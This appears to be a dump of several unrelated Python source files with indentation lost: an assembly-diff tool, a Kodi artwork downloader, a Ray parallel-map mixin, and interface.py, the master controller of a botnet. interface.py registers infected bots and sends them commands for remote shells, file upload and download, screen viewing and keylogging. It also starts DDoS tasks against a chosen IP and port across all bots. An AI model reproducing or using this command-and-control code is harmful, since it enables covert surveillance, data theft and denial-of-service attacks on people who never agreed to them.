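# Debounce: after the first change event, keep waiting until DEBOUNCE_DELAY has
# passed since the most recent event (draining any further events meanwhile),
# then emit a single timestamp so rapid successive saves trigger only one rebuild.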
while True:
t = listenq.get()
more = True
while more:
delay = t + DEBOUNCE_DELAY - time.time()
if delay > 0:
time.sleep(delay)
# consume entire queue
more = False
try:
while True:
t = listenq.get(block=False)
more = True
except queue.Empty:
pass
outq.put(t)
th = threading.Thread(target=debounce_thread, daemon=True)
th.start()
class Display:
basedump: str
mydump: str
last_refresh_key: object
config: Config
emsg: Optional[str]
last_diff_output: Optional[Diff]
pending_update: Optional[str]
ready_queue: "queue.Queue[None]"
watch_queue: "queue.Queue[Optional[float]]"
less_proc: "Optional[subprocess.Popen[bytes]]"
def __init__(self, basedump: str, mydump: str, config: Config) -> None:
self.config = config
self.base_lines = process(basedump, config)
self.mydump = mydump
self.emsg = None
self.last_refresh_key = None
self.last_diff_output = None
def run_diff(self) -> Tuple[str, object]:
if self.emsg is not None:
return (self.emsg, self.emsg)
my_lines = process(self.mydump, self.config)
diff_output = do_diff(self.base_lines, my_lines, self.config)
last_diff_output = self.last_diff_output or diff_output
if self.config.threeway != "base" or not self.last_diff_output:
self.last_diff_output = diff_output
meta, diff_lines = align_diffs(last_diff_output, diff_output, self.config)
output = self.config.formatter.table(meta, diff_lines)
refresh_key = (
[line.key2 for line in diff_output.lines],
diff_output.score,
)
return (output, refresh_key)
def run_less(
self, output: str
) -> "Tuple[subprocess.Popen[bytes], subprocess.Popen[bytes]]":
# Pipe the output through 'tail' and only then to less, to ensure the
# write call doesn't block. ('tail' has to buffer all its input before
# it starts writing.) This also means we don't have to deal with pipe
# closure errors.
buffer_proc = subprocess.Popen(
BUFFER_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
less_proc = subprocess.Popen(LESS_CMD, stdin=buffer_proc.stdout)
assert buffer_proc.stdin
assert buffer_proc.stdout
buffer_proc.stdin.write(output.encode())
buffer_proc.stdin.close()
buffer_proc.stdout.close()
return (buffer_proc, less_proc)
def run_sync(self) -> None:
output, _ = self.run_diff()
proca, procb = self.run_less(output)
procb.wait()
proca.wait()
def run_async(self, watch_queue: "queue.Queue[Optional[float]]") -> None:
self.watch_queue = watch_queue
self.ready_queue = queue.Queue()
self.pending_update = None
output, refresh_key = self.run_diff()
self.last_refresh_key = refresh_key
dthread = threading.Thread(target=self.display_thread, args=(output,))
dthread.start()
self.ready_queue.get()
def display_thread(self, initial_output: str) -> None:
proca, procb = self.run_less(initial_output)
self.less_proc = procb
self.ready_queue.put(None)
while True:
ret = procb.wait()
proca.wait()
self.less_proc = None
if ret != 0:
# fix the terminal
os.system("tput reset")
if ret != 0 and self.pending_update is not None:
# killed by program with the intent to refresh
output = self.pending_update
self.pending_update = None
proca, procb = self.run_less(output)
self.less_proc = procb
self.ready_queue.put(None)
else:
# terminated by user, or killed
self.watch_queue.put(None)
self.ready_queue.put(None)
break
def progress(self, msg: str) -> None:
# Write message to top-left corner
sys.stdout.write("\x1b7\x1b[1;1f{}\x1b8".format(msg + " "))
sys.stdout.flush()
def update(self, text: str, error: bool) -> None:
if not error and not self.emsg and text == self.mydump:
self.progress("Unchanged. ")
return
if not error:
self.mydump = text
self.emsg = None
else:
self.emsg = text
output, refresh_key = self.run_diff()
if refresh_key == self.last_refresh_key:
self.progress("Unchanged. ")
return
self.last_refresh_key = refresh_key
self.pending_update = output
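# display_thread treats a non-zero pager exit combined with a pending_update as
# a refresh request and restarts less with the new output, signalling readiness
# back through ready_queue.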
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def terminate(self) -> None:
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def main() -> None:
args = parser.parse_args()
# Apply project-specific configuration.
settings: Dict[str, Any] = {}
diff_settings.apply(settings, args) # type: ignore
project = create_project_settings(settings)
try:
config = create_config(args, project)
except ValueError as e:
fail(str(e))
if config.algorithm == "levenshtein":
try:
import Levenshtein
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.show_source:
try:
import cxxfilt
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.threeway and not args.watch:
fail("Threeway diffing requires -w.")
if args.diff_elf_symbol:
make_target, basecmd, mycmd = dump_elf(
args.start, args.end, args.diff_elf_symbol, config, project
)
elif config.diff_obj:
make_target, basecmd, mycmd = dump_objfile(
args.start, args.end, config, project
)
else:
make_target, basecmd, mycmd = dump_binary(args.start, args.end, config, project)
map_build_target_fn = getattr(diff_settings, "map_build_target", None)
if map_build_target_fn:
make_target = map_build_target_fn(make_target=make_target)
if args.write_asm is not None:
mydump = run_objdump(mycmd, config, project)
with open(args.write_asm, "w") as f:
f.write(mydump)
print(f"Wrote assembly to {args.write_asm}.")
sys.exit(0)
if args.base_asm is not None:
with open(args.base_asm) as f:
basedump = f.read()
else:
basedump = run_objdump(basecmd, config, project)
mydump = run_objdump(mycmd, config, project)
display = Display(basedump, mydump, config)
if args.no_pager or args.format in ("html", "json"):
print(display.run_diff()[0])
elif not args.watch:
display.run_sync()
else:
if not args.make:
yn = input(
"Warning: watch-mode (-w) enabled without auto-make (-m). "
"You will have to run make manually. Ok? (Y/n) "
)
if yn.lower() == "n":
return
if args.make:
watch_sources = None
watch_sources_for_target_fn = getattr(
diff_settings, "watch_sources_for_target", None
)
if watch_sources_for_target_fn:
watch_sources = watch_sources_for_target_fn(make_target)
watch_sources = watch_sources or project.source_directories
if not watch_sources:
fail("Missing source_directories config, don't know what to watch.")
else:
watch_sources = [make_target]
q: "queue.Queue[Optional[float]]" = queue.Queue()
debounced_fs_watch(watch_sources, q, config, project)
display.run_async(q)
last_build = 0.0
try:
while True:
t = q.get()
if t is None:
break
if t < last_build:
continue
last_build = time.time()
if args.make:
display.progress("Building...")
ret = run_make_capture_output(make_target, project)
if ret.returncode != 0:
display.update(
ret.stderr.decode("utf-8-sig", "replace")
or ret.stdout.decode("utf-8-sig", "replace"),
error=True,
)
continue
mydump = run_objdump(mycmd, config, project)
display.update(mydump, error=False)
except KeyboardInterrupt:
display.terminate()
if __name__ == "__main__":
main()
|
filemanager.py | import os
import re
import threading
import urllib
try:
import urllib.parse as urlparse
except ImportError: # py2
import urlparse
import xbmc
import xbmcvfs
from contextlib import closing
from lib import cleaner
from lib.libs import mediainfo as info, mediatypes, pykodi, quickjson, utils
from lib.libs.addonsettings import settings
from lib.libs.pykodi import localize as L, log
from lib.libs.webhelper import Getter, GetterError
CANT_CONTACT_PROVIDER = 32034
HTTP_ERROR = 32035
CANT_WRITE_TO_FILE = 32037
REMOTE_CONTROL_REQUIRED = 32039
FILEERROR_LIMIT = 3
PROVIDERERROR_LIMIT = 3
TEMP_DIR = 'special://temp/recycledartwork/'
typemap = {'image/jpeg': 'jpg', 'image/png': 'png', 'image/gif': 'gif'}
# REVIEW: Deleting replaced artwork. If [movie base name]-fanart.jpg exists and AB is
# configured for fanart.jpg, downloading a new artwork will save to the short name but
# leave the long name, and the next scan will pick up the long name.
# ditto scanning 'logo.png' at first and saving new 'clearlogo.png', but clearlogo will be picked
# first by the next scan so that's not such a big deal.
class FileManager(object):
def __init__(self, debug=False, bigcache=False):
self.getter = Getter()
self.getter.session.headers['User-Agent'] = settings.useragent
self.size = 0
self.fileerror_count = 0
self.provider_errors = {}
self.debug = debug
self.alreadycached = None if not bigcache else []
self._build_imagecachebase()
def _build_imagecachebase(self):
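# Query Kodi's web server settings over JSON-RPC and build the local
# 'http(s)://[user:pass@]localhost:<port>/image/' base URL used to pre-cache
# artwork; falls back to None (with a warning) when the web server is disabled.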
result = pykodi.execute_jsonrpc({"jsonrpc": "2.0", "id": 1, "method": "Settings.GetSettings",
"params": {"filter": {"category": "control", "section": "services"}}})
port = 80
username = ''
password = ''
secure = False
server_enabled = True
if result.get('result', {}).get('settings'):
for setting in result['result']['settings']:
if setting['id'] == 'services.webserver' and not setting['value']:
server_enabled = False
break
if setting['id'] == 'services.webserverusername':
username = setting['value']
elif setting['id'] == 'services.webserverport':
port = setting['value']
elif setting['id'] == 'services.webserverpassword':
password = setting['value']
elif setting['id'] == 'services.webserverssl' and setting['value']:
secure = True
username = '{0}:{1}@'.format(username, password) if username and password else ''
else:
server_enabled = False
if server_enabled:
protocol = 'https' if secure else 'http'
self.imagecachebase = '{0}://{1}localhost:{2}/image/'.format(protocol, username, port)
else:
self.imagecachebase = None
log(L(REMOTE_CONTROL_REQUIRED), xbmc.LOGWARNING)
def downloadfor(self, mediaitem, allartwork=True):
if self.fileerror_count >= FILEERROR_LIMIT:
return False, ''
if not info.can_saveartwork(mediaitem):
return False, ''
to_download = get_downloadable_art(mediaitem, allartwork)
if not to_download:
return False, ''
services_hit = False
error = ''
localfiles = get_local_art(mediaitem, allartwork)
for arttype, url in to_download.items():
hostname = urlparse.urlparse(url).netloc
if self.provider_errors.get(hostname, 0) >= PROVIDERERROR_LIMIT:
continue
full_basefilepath = info.build_artwork_basepath(mediaitem, arttype)
if not full_basefilepath:
continue
if self.debug:
mediaitem.downloadedart[arttype] = full_basefilepath + '.ext'
continue
result, err = self.doget(url)
if err:
error = err
self.provider_errors[hostname] = self.provider_errors.get(hostname, 0) + 1
continue
if not result:
# 404 URL dead, wipe it so we can add another one later
mediaitem.downloadedart[arttype] = None
continue
self.size += int(result.headers.get('content-length', 0))
services_hit = True
ext = get_file_extension(result.headers.get('content-type'), url)
if not ext:
log("Can't determine extension for '{0}'\nfor image type '{1}'".format(url, arttype))
continue
full_basefilepath += '.' + ext
if xbmcvfs.exists(full_basefilepath):
if extrafanart_name_used(full_basefilepath, localfiles):
# REVIEW: can this happen in any other circumstance?
full_basefilepath = get_next_filename(full_basefilepath, localfiles)
localfiles.append(full_basefilepath)
if xbmcvfs.exists(full_basefilepath) and settings.recycle_removed:
recyclefile(full_basefilepath)
else:
folder = os.path.dirname(full_basefilepath)
if not xbmcvfs.exists(folder):
xbmcvfs.mkdirs(folder)
# For now this just downloads the whole thing in memory, then saves it to file.
# Maybe chunking it will be better when GIFs are handled
file_ = xbmcvfs.File(full_basefilepath, 'wb')
with closing(file_):
if not file_.write(result.content):
self.fileerror_count += 1
raise FileError(L(CANT_WRITE_TO_FILE).format(full_basefilepath))
self.fileerror_count = 0
mediaitem.downloadedart[arttype] = full_basefilepath
log("downloaded '{0}'\nto image file '{1}'".format(url, full_basefilepath))
return services_hit, error
def doget(self, url, **kwargs):
try:
result = self.getter(url, **kwargs)
if not result and url.startswith('http://'):
# Try https, the browser "that totally shows this image" probably is, even if no redirect
result, err = self.doget('https://' + url[7:])
if err or not result:
result = None
return result, None
except GetterError as ex:
message = L(CANT_CONTACT_PROVIDER) if ex.connection_error else L(HTTP_ERROR).format(ex.message)
return None, message
def remove_deselected_files(self, mediaitem, assignedart=False):
if self.debug:
return
for arttype, newimage in mediaitem.selectedart.iteritems():
if newimage is not None:
continue
if assignedart:
oldimage = mediaitem.art.get(arttype)
else:
oldimage = mediaitem.forcedart.get(arttype)
if not oldimage:
continue
old_url = oldimage['url'] if isinstance(oldimage, dict) else \
oldimage if isinstance(oldimage, basestring) else oldimage[0]['url']
if not old_url or old_url.startswith(pykodi.notimagefiles) \
or old_url in mediaitem.selectedart.values() or not xbmcvfs.exists(old_url):
continue
if settings.recycle_removed:
recyclefile(old_url)
xbmcvfs.delete(old_url)
def set_bigcache(self):
if self.alreadycached is None:
self.alreadycached = []
def cachefor(self, artmap, multiplethreads=False):
if not self.imagecachebase or self.debug:
return 0
urls = [url for url in artmap.values() if url and not url.startswith(('http', 'image'))]
if not urls:
return 0
if self.alreadycached is not None:
if not self.alreadycached:
self.alreadycached = [pykodi.unquoteimage(texture['url']) for texture in quickjson.get_textures()
if not pykodi.unquoteimage(texture['url']).startswith(('http', 'image'))]
alreadycached = self.alreadycached
else:
alreadycached = [pykodi.unquoteimage(texture['url']) for texture in quickjson.get_textures(urls)]
count = [0]
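# A one-element list lets the nested worker() update the tally without 'nonlocal',
# which is unavailable in the Python 2 runtime this module targets.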
def worker(path):
try:
res, _ = self.doget(self.imagecachebase + urllib.quote(pykodi.quoteimage(path), ''), stream=True)
if res:
res.iter_content(chunk_size=1024)
res.close()
count[0] += 1
except GetterError:
pass
threads = []
for path in urls:
if path in alreadycached:
continue
if multiplethreads:
t = threading.Thread(target=worker, args=(path,))
threads.append(t)
t.start()
else:
worker(path)
for t in threads:
t.join()
return count[0]
def extrafanart_name_used(path, localfiles):
return utils.parent_dir(path) == 'extrafanart' and path in localfiles
def get_file_extension(contenttype, request_url, re_search=re.compile(r'\.\w*$')):
if contenttype in typemap:
return typemap[contenttype]
if re.search(re_search, request_url):
return request_url.rsplit('.', 1)[1]
def get_next_filename(full_basefilepath, localfiles):
nextname = full_basefilepath
char_int = 97
while nextname in localfiles:
name, ext = os.path.splitext(full_basefilepath)
nextname = name + chr(char_int) + ext
char_int += 1
return nextname
def get_downloadable_art(mediaitem, allartwork):
if allartwork:
downloadable = dict(mediaitem.art)
downloadable.update(mediaitem.selectedart)
else:
downloadable = dict(mediaitem.selectedart)
for arttype in list(downloadable):
if not downloadable[arttype] or not downloadable[arttype].startswith('http') or \
not mediatypes.downloadartwork(mediaitem.mediatype, arttype):
del downloadable[arttype]
return downloadable
def get_local_art(mediaitem, allartwork):
local = []
if allartwork:
arts = mediaitem.art if settings.clean_imageurls else \
cleaner.clean_artwork(mediaitem) # library URLs not cleaned, but can still help here
for url in arts.values():
if url and not url.startswith('http'):
local.append(url)
for url in mediaitem.selectedart.values():
if url and not url.startswith('http'):
local.append(url)
return local
def recyclefile(filename):
firstdir = utils.parent_dir(filename)
directory = TEMP_DIR
pathsep = utils.get_pathsep(directory)
if firstdir in ('extrafanart', 'extrathumbs'):
directory += utils.parent_dir(os.path.dirname(filename)) + pathsep
directory += firstdir
if not xbmcvfs.exists(directory):
xbmcvfs.mkdirs(directory)
recycled_filename = directory + pathsep + os.path.basename(filename)
if not xbmcvfs.copy(filename, recycled_filename):
raise FileError(L(CANT_WRITE_TO_FILE).format(recycled_filename))
class FileError(Exception):
def __init__(self, message, cause=None):
super(FileError, self).__init__()
self.cause = cause
self.message = message
|
interface.py | # Date: 06/07/2018
# Author: Pure-L0G1C
# Description: Interface for the master
from re import match
from lib import const
from hashlib import sha256
from time import time, sleep
from os import urandom, path
from threading import Thread
from datetime import datetime
from os import getcwd, path, remove
from . import ssh, sftp, sscreenshare
######## Screenshare ########
class ScreenShare:
screen_src = path.join(getcwd(), 'templates', 'screen.html')
def __init__(self, bot, update):
self.sscreenshare = sscreenshare.SScreenShare(
const.PRIVATE_IP,
const.FTP_PORT
)
self.bot_id = bot['bot_id']
self.shell = bot['shell']
self.update = update
@property
def is_alive(self):
return self.sscreenshare.is_alive
def start(self, code):
print('Starting screenshare ...')
self.shell.send(code=code, args=self.update)
Thread(target=self.sscreenshare.start, daemon=True).start()
def stop(self):
print('Stopping screenshare ...')
self.shell.send(code=16)
self.sscreenshare.stop()
if path.exists(ScreenShare.screen_src):
try:
remove(ScreenShare.screen_src)
except:
pass
def close(self):
self.stop()
######## FTP ########
class FTP(object):
def __init__(self, file, bot, download=True):
self.sftp = sftp.sFTP(
const.PRIVATE_IP, const.FTP_PORT, max_time=60, verbose=True)
self.bot_id = bot['bot_id']
self.shell = bot['shell']
self.download = download
self.is_alive = False
self.success = False
self.time = None
self.file = file
def send(self, code, file=None):
if not path.exists(file):
return
self.shell.send(code=code, args=file)
self.is_alive = True
self.sftp.send(file)
self.is_alive = False
self.time = self.sftp.time_elapsed
self.success = True if self.sftp.error_code != -1 else False
def recv(self, code, file=None):
self.shell.send(code=code, args=file)
self.is_alive = True
self.sftp.recv()
self.is_alive = False
self.time = self.sftp.time_elapsed
self.success = True if self.sftp.error_code != -1 else False
def close(self):
self.sftp.close()
self.is_alive = False
######## Tasks #########
class Task(object):
def __init__(self, task_id, task_args, task_info_obj):
self.id = task_id
self.args = task_args
self.task_info_obj = task_info_obj
def start(self, bots):
for bot in [bots[bot] for bot in bots]:
bot['shell'].send(10, (self.id, self.args))
def stop(self, bots):
for bot in [bots[bot] for bot in bots]:
bot['shell'].send(11)
class TaskDdos(object):
def __init__(self, target, threads):
self.target = target
self.threads = threads
self.time_assigned = time()
def info(self):
time_assigned = datetime.fromtimestamp(
self.time_assigned).strftime('%b %d, %Y at %I:%M %p')
a = 'Task name: Ddos Attack\nTime assigned: {}\n\n'.format(
time_assigned)
b = 'Target: {}\nThreads: {}'.format(self.target, self.threads)
return a + b
######## Interface ########
class Interface(object):
def __init__(self):
self.bots = {}
self.ssh = None
self.ftp = None
self.task = None
self.screenshare = None
self.sig = self.signature
def close(self):
if self.ftp:
self.ftp.close()
self.ftp = None
if self.ssh:
self.ssh.close()
self.ssh = None
if self.screenshare:
self.screenshare.close()
self.screenshare = None
self.disconnect_all()
def gen_bot_id(self, uuid):
bot_ids = [self.bots[bot]['bot_id'] for bot in self.bots]
while 1:
bot_id = sha256((sha256(urandom(64 * 32) + urandom(64 * 64)
).digest().hex() + uuid).encode()).digest().hex()
if not bot_id in bot_ids:
break
return bot_id
@property
def signature(self):
bots = b''
for bot in self.bots:
bot_id = self.bots[bot]['bot_id']
bot_id = bot_id[:8] + bot_id[-8:]
bots += bot_id.encode()
return sha256(bots).digest().hex()
def is_connected(self, uuid):
for bot in self.bots:
if self.bots[bot]['uuid'] == uuid:
return True
return False
def connect_client(self, sess_obj, conn_info, shell):
uuid = conn_info['args']['sys_info']['uuid']
if self.is_connected(uuid):
self.close_sess(sess_obj, shell)
else:
bot_id = self.gen_bot_id(uuid)
self.bots[sess_obj] = {'bot_id': bot_id, 'uuid': uuid,
'intel': conn_info['args'], 'shell': shell, 'session': sess_obj}
self.sig = self.signature
print(self.bots)
if self.task:
shell.send(10, (self.task.id, self.task.args))
def close_sess(self, sess_obj, shell_obj):
print('Closing session ...')
shell_obj.is_alive = False
shell_obj.send(code=7, args=None) # 7 - disconnect
sess_obj.close()
if sess_obj in self.bots:
del self.bots[sess_obj]
self.sig = self.signature
def disconnect_client(self, sess_obj):
print('Disconnecting client ...')
if sess_obj in self.bots:
self.bots[sess_obj]['shell'].is_alive = False
bot_id = self.bots[sess_obj]['bot_id']
if self.ftp:
if self.ftp.bot_id == bot_id:
self.ftp.close()
self.ftp = None
self.close_sess(sess_obj, self.bots[sess_obj]['shell'])
self.sig = self.signature
def disconnect_all(self):
for bot in [self.bots[bot] for bot in self.bots]:
bot['session'].close()
self.sig = self.signature
def get_bot(self, bot_id):
for bot in self.bots:
if self.bots[bot]['bot_id'] == bot_id:
return self.bots[bot]
def ssh_obj(self, bot_id):
bot = self.get_bot(bot_id)
if bot:
if self.ssh:
self.ssh.close()
self.ssh = ssh.SSH(const.PRIVATE_IP, const.SSH_PORT,
max_time=30, verbose=True)
sock_obj = self.ssh.start()
if sock_obj:
t = Thread(target=self.ssh.serve, args=[sock_obj])
t.daemon = True
t.start()
bot['session'].send(code=1)
return self.ssh
else:
self.ssh.close()
self.ssh = None
def ssh_exe(self, cmd):
return self.ssh.send(cmd)
def ftp_obj(self, bot_id, cmd_id, file, override):
bot = self.get_bot(bot_id)
if not bot:
return ''
if cmd_id == 3:
if not path.exists(file):
return 'Upload process failed; the file {} was not found'.format(file)
if self.ftp:
if all([self.ftp.is_alive, not override]):
return 'Already {} {} {} {}. Use --override option to override this process'.format('Downloading' if self.ftp.download else 'Uploading',
self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8])
self.ftp.close()
del self.ftp
if self.screenshare:
if self.screenshare.is_alive and not override:
return 'Viewing the screen of {}. Use --override option to override this process'.format(
self.screenshare.bot_id[:8]
)
self.screenshare.close()
del self.screenshare
self.screenshare = None
self.ftp = FTP(file, bot, download=False if cmd_id == 3 else True)
ftp_func = self.ftp.send if cmd_id == 3 else self.ftp.recv
Thread(target=ftp_func, args=[cmd_id, file], daemon=True).start()
return '{} process started successfully'.format('Download' if self.ftp.download else 'Upload')
def ftp_status(self):
if not self.ftp:
return 'No file transfer in progress'
if self.ftp.is_alive:
return '{} {} {} {}. Check back in 1 minute'.format('Downloading' if self.ftp.download else 'Uploading',
self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8])
else:
return 'Attempted to {} {} {} {}. The process {} a success. Time-elapsed: {}(sec)'.format('download' if self.ftp.download else 'upload',
self.ftp.file, 'from' if self.ftp.download else 'to',
self.ftp.bot_id[:8], 'was' if self.ftp.success else 'was not', self.ftp.time)
def write_screen_scr(self, update):
html = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<title>Screenshare</title>
</head>
<body>
<div id="container">
<img src="../static/img/screen.png" alt="" height="512" width="1024" id="img" />
</div>
<script>
window.onload = function() {{
var image = document.getElementById('img');
function updateImage() {{
image.src = image.src.split('?')[0] + '?' + new Date().getTime();
}}
setInterval(updateImage, {});
}};
window.onfocus = function() {{
location.reload();
}};
</script>
<style>
body {{
background: #191919;
}}
img {{
border-radius: 5px;
}}
#container {{
text-align: center;
padding-top: 8%;
}}
</style>
</body>
</html>
'''.format(update * 1000)
with open(ScreenShare.screen_src, 'wt') as f:
f.write(html)
def screenshare_obj(self, bot_id, cmd_id, update, override):
bot = self.get_bot(bot_id)
if not bot:
return ''
if self.ftp:
if self.ftp.is_alive and not override:
return 'Already {} {} {} {}. Use --override option to override this process'.format('Downloading' if self.ftp.download else 'Uploading',
self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8])
self.ftp.close()
del self.ftp
self.ftp = None
if self.screenshare:
if self.screenshare.is_alive and not override:
return 'Already viewing the screen of {}. Use --override option to override this process'.format(
self.screenshare.bot_id[:8]
)
self.screenshare.close()
self.screenshare.update = update
self.screenshare.shell = bot['shell']
self.screenshare.bot_id = bot['bot_id']
else:
self.screenshare = ScreenShare(bot, update)
self.screenshare.start(cmd_id)
self.write_screen_scr(update)
return 'Screenshare is being hosted at the URL: {}'.format(ScreenShare.screen_src)
def execute_cmd_by_id(self, bot_id, cmd_id, args):
override = True if '--override' in args else False
if not cmd_id.isdigit():
return 'Failed to send command'
cmd_id = int(cmd_id)
if override:
args.pop(args.index('--override'))
if cmd_id == 1:
return self.ftp_status()
if cmd_id == 15:
update = ''.join(args[0]).strip()
if not update:
return 'Please provide an update time in seconds'
try:
update = float(update)
except ValueError:
return 'Please provide an integer for update time'
return self.screenshare_obj(bot_id, cmd_id, update, override)
if cmd_id == 16:
if not self.screenshare:
return 'Screenshare is inactive'
if not self.screenshare.is_alive:
return 'Screenshare is inactive'
self.screenshare.stop()
return 'Stopped screenshare ...'
if cmd_id == 17:
if not self.screenshare:
return 'Screenshare is inactive'
if not self.screenshare.is_alive:
return 'Screenshare is inactive'
return 'Viewing the screen of {}\nUpdating every {} seconds\nURL: {}'.format(
self.screenshare.bot_id[:8], self.screenshare.update, ScreenShare.screen_src
)
elif any([cmd_id == 3, cmd_id == 4, cmd_id == 5]):
return self.ftp_obj(bot_id, cmd_id, ' '.join(args[0:]) if cmd_id != 5 else 'a screenshot', override)
else:
bot = self.get_bot(bot_id)
if bot:
bot['shell'].send(code=cmd_id, args=args)
if cmd_id == 12:
if not bot['shell'].keylogging:
bot['shell'].keylogging = True
else:
return 'Keylogger is already active'
if cmd_id == 13:
if bot['shell'].keylogging:
bot['shell'].keylogging = False
else:
return 'Keylogger is already inactive'
if all([cmd_id == 14, not bot['shell'].keylogging]):
return 'Keylogger is inactive'
return self.keystrokes(bot['shell']) if cmd_id == 14 else 'Command sent successfully'
return 'Failed to send command'
def keystrokes(self, bot_shell):
while all([bot_shell.is_alive, not bot_shell.keystrokes]):
pass
try:
if all([bot_shell.is_alive, bot_shell.keystrokes]):
keystrokes = bot_shell.keystrokes
bot_shell.keystrokes = None
return keystrokes if keystrokes != '-1' else ''
except:
pass
def start_task(self):
Thread(target=self.task.start, args=[self.bots], daemon=True).start()
def stop_task(self):
if self.task:
t = Thread(target=self.task.stop, args=[self.bots], daemon=True)
t.start()
t.join()
self.task = None
def execute_cmd_by_task_id(self, cmd_id, args):
if not cmd_id.isdigit():
return 'Failed to send command'
cmd_id = int(cmd_id)
if cmd_id == 0: # stop task
Thread(target=self.stop_task, daemon=True).start()
return 'Task terminated' if self.task else 'No task is set'
elif cmd_id == 1: # status
return self.get_task()
else:
resp = self.set_task(cmd_id, args)
if resp == True:
self.start_task()
return 'Task set successfully'
else:
return resp
def get_task(self):
return 'No task is set' if not self.task else self.task.task_info_obj.info()
def set_task(self, task_id, args):
if task_id == 2: # ddos
return self.set_ddos_task(args)
else:
return 'Failed to set task'
def set_ddos_task(self, args):
task_id = 1 # the task id on the bot side
if not len(args) == 3:
return 'Invalid amount of arguments'
ip, port, threads = args
if not self.valid_ip(ip):
return 'Invalid IP address'
if not self.valid_port(port):
return 'Invalid port'
if not self.valid_thread(threads):
return 'Invalid thread'
task_info_obj = TaskDdos('{}:{}'.format(ip, port), threads)
self.task = Task(task_id, (ip, int(port), int(threads)), task_info_obj)
return True
def valid_thread(self, thread):
return True if thread.isdigit() else False
def valid_ip(self, ip):
return False if not match(r'^(?!0)(?!.*\.$)((1?\d?\d|25[0-5]|2[0-4]\d)(\.|$)){4}$', ip) else True
def valid_port(self, port):
_port = str(port).strip()
if not len(_port):
return False
else:
# check if number
for item in _port:
if not item.isdigit():
return False
# check if number starts with a zero
if int(_port[0]) == 0:
return False
# check if number is larger than 65535
if int(_port) > 65535:
return False
return True
|
ray.py | from queue import Queue
import asyncio
import threading
import uuid
from towhee.hub.file_manager import FileManagerConfig
from towhee.utils.log import engine_log
from towhee.functional.option import Option, Empty, _Reason
from towhee.functional.mixins.parallel import EOS
def _map_task_ray(unary_op):
def map_wrapper(x):
try:
if isinstance(x, Option):
return x.map(unary_op)
else:
return unary_op(x)
except Exception as e: # pylint: disable=broad-except
engine_log.warning(f'{e}, please check {x} with op {unary_op}. Continue...') # pylint: disable=logging-fstring-interpolation
return Empty(_Reason(x, e))
return map_wrapper
class RayMixin:
"""
Mixin for parallel ray execution.
"""
def ray_start(self, address = None, local_packages: list = None, pip_packages: list = None, silence = True):
"""
Start the ray service. When using a remote cluster, all dependencies for custom functions
and operators defined locally will need to be sent to the ray cluster. If using ray locally,
within the runtime, avoid passing in any arguments.
Args:
address (str):
The address for the ray service being connected to. If using ray cluster
remotely with kubectl forwarded port, the most likely address will be "ray://localhost:10001".
local_packages (list[str]):
Whichever locally defined modules that are used within a custom function supplied to the pipeline,
whether it be in lambda functions, locally registered operators, or functions themselves.
pip_packages (list[str]):
Whichever pip installed modules that are used within a custom function supplied to the pipeline,
whether it be in lambda functions, locally registered operators, or functions themselves.
"""
import ray #pylint: disable=import-outside-toplevel
local_packages = [] if local_packages is None else local_packages
pip_packages = [] if pip_packages is None else pip_packages
if ('towhee' not in pip_packages and 'towhee' not in [str(x.__name__) for x in local_packages]) and (address is not None):
pip_packages.append('towhee')
runtime_env={'py_modules': local_packages, 'pip': pip_packages }
ray.init(address = address, runtime_env = runtime_env, ignore_reinit_error=True, log_to_driver = silence)
self._backend_started = True
return self
def ray_resolve(self, call_mapping, path, index, *arg, **kws):
import ray #pylint: disable=import-outside-toplevel
if self.get_backend_started() is None:
self.ray_start()
# TODO: call mapping solution
y = call_mapping #pylint: disable=unused-variable
@ray.remote
class OperatorActor:
"""Ray actor that runs hub operators."""
def __init__(self, path1, index1, uid, *arg1, **kws1):
from towhee import engine #pylint: disable=import-outside-toplevel
from towhee.engine.factory import _ops_call_back #pylint: disable=import-outside-toplevel
from pathlib import Path #pylint: disable=import-outside-toplevel
engine.DEFAULT_LOCAL_CACHE_ROOT = Path.home() / ('.towhee/ray_actor_cache_' + uid)
engine.LOCAL_PIPELINE_CACHE = engine.DEFAULT_LOCAL_CACHE_ROOT / 'pipelines'
engine.LOCAL_OPERATOR_CACHE = engine.DEFAULT_LOCAL_CACHE_ROOT / 'operators'
x = FileManagerConfig()
x.update_default_cache(engine.DEFAULT_LOCAL_CACHE_ROOT)
self.op = _ops_call_back(path1, index1, *arg1, **kws1)
def __call__(self, *arg1, **kwargs1):
return self.op(*arg1, **kwargs1)
def cleanup(self):
from shutil import rmtree #pylint: disable=import-outside-toplevel
from towhee import engine #pylint: disable=import-outside-toplevel
rmtree(engine.DEFAULT_LOCAL_CACHE_ROOT)
actors = [OperatorActor.remote(path, index, str(uuid.uuid4().hex[:12].upper()), *arg, **kws) for _ in range(self._num_worker)]
pool = ray.util.ActorPool(actors)
queue = Queue(self._num_worker)
def inner():
while True:
x = queue.get()
if isinstance(x, EOS):
break
else:
yield x
for x in actors:
x.cleanup.remote()
def worker():
for x in self:
while pool.has_free() is False:
if pool.has_next():
queue.put(pool.get_next())
pool.submit(lambda a, v: a.__call__.remote(v), x)
while pool.has_next():
queue.put(pool.get_next())
queue.put(EOS())
t = threading.Thread(target=worker)
t.start()
return self._factory(inner())
def _ray_pmap(self, unary_op, num_worker=None):
import ray #pylint: disable=import-outside-toplevel
if self.get_backend_started() is None:
self.ray_start()
if num_worker is not None:
pass
elif self.get_executor() is not None:
num_worker = self._num_worker
else:
num_worker = 2
# TODO: Dynamic queue size
if self.is_stream:
queue = Queue(num_worker)
else:
queue = Queue()
loop = asyncio.new_event_loop()
def inner():
while True:
x = queue.get()
if isinstance(x, EOS):
break
else:
yield x
@ray.remote
def remote_runner(val):
return _map_task_ray(unary_op)(val)
async def worker():
buff = []
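# Keep at most num_worker Ray tasks in flight: once the buffer is full, await the
# oldest future and forward its result, so outputs stay in submission order.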
for x in self:
if len(buff) == num_worker:
queue.put(await buff.pop(0))
